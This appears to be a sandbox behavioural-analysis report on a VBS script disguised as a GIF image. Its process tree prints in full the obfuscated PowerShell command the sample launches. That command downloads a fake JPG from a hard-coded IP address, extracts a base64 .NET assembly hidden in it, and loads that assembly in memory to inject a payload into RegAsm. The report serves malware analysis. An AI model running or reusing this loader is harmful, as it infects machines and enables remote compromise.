
Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\profilegoodforinvestreturntogold.gif.vbs

    3044
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex 
-'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"

      2292

Process contents
